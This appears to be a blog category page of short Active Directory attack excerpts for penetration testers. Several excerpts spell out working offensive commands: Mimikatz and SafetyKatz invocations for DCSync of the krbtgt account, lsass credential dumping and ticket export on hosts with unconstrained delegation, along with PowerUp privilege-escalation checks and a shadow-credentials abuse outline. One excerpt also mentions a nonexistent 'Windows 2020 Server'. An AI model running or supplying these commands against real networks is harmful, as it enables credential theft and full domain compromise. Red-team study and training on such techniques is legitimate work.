Methodology Enumerate computers with Unconstrained Delegation Get-NetComputer -UnConstrained Check if a token is available and save to disk Get admin token After compromising the computer with UD enabled, we can trick or wait for an admin connection Invoke-Mimikatz -Command ‘”sekurlsa::tickets /export”‘ Reuse of the DA token…
Ad Attacks
1 Min Read
Steps to execute: # Invoke-Mimikatz Invoke-Mimikatz -Command ‘”lsadump::dcsync /user:us\krbtgt”‘ # SafetyKatz SafetyKatz.exe “lsadump::dcsync /user:us\krbtgt” “exit” # SafetyKatz Old (For Windows 2020 Server) SafetyKatz_old.exe “lsadump::dcsync /user:us\krbtgt” “exit”
Ad Attacks
1 Min Read
1. Mimikatz Dump credentials on a local machine using Mimikatz Invoke-Mimikatz -Command ‘”sekurlsa::ekeys”‘ 2. SafetyKatz Using SafetyKatz (Minidump of lsass and PELoader to run Mimikatz) SafetyKatz.exe -Command “sekurlsa::ekeys” “exit” # SafetyKatz Old (For Windows 2020 Server) SafetyKatz_old.exe -Command “sekurlsa::ekeys” “exit” 3. SharpKatz Dump credentials Using…
Ad Attacks
1 Min Read
PowerUp Get services with unquoted paths and a space in their name. Get-ServiceUnquoted -Verbose Get-WmiObject -class win32_service | select pathname (wmi command/lists all paths) Get services where the current user can write to its binary path or change arguments to the binary Get-ModifiableServiceFile -Verbose Get…
Ad Attacks
1 Min Read
In this informative tutorial, we dive into the essentials of using PowerView to enumerate trusts effortlessly. Whether you’re a cybersecurity professional, a penetration tester, or simply curious about Active Directory enumeration, this tutorial will guide you through a simple yet effective trick to uncover domain…
Ad Attacks
1 Min Read
Delve into the world of cyber security with our comprehensive guide on ACL Enumeration. Understand how Access Control Lists (ACLs) function and how enumeration plays a critical role in network security. Equipped with tips, methods, and expert advice, this blog provides valuable insights into ACL…
Ad Attacks
2 Min Read
Explore the intricate world of Group Policy Objects (GPO) Enumeration in our latest blog post. Learn how GPO enumeration helps manage network systems more efficiently, building a secure and controlled environment while reducing configuration errors. Stay on top of the latest trends and technologies in…
Ad Attacks
3 Min Read
Dive into our comprehensive guide that discusses ‘Domain Enumeration using PowerView’, an essential process in the field of cybersecurity. Understand its core tenets, why it matters, the potential risks, and how to effectively use it to secure your online assets. Learn from the experts as…
Ad Attacks
1 Min Read
Abusing User Object 1. Enumerate the permissions 2. Add the Shadow Credential 3. Using PowerView, see if the Shadow Credential is added. 4. Request the TGT by leveraging the certificate 5. Inject the TGT in the current session or use the NTLM hash
Ad Attacks
3 Min Read
Introduction to Cross Domain Attacks Cross domain attacks are a significant threat in today’s interconnected digital environment. These attacks exploit the trust relationships between different internet domains to gain unauthorized access to sensitive information or services. With the increasing use of cloud solutions, such as…
Page 1 of 2
Next
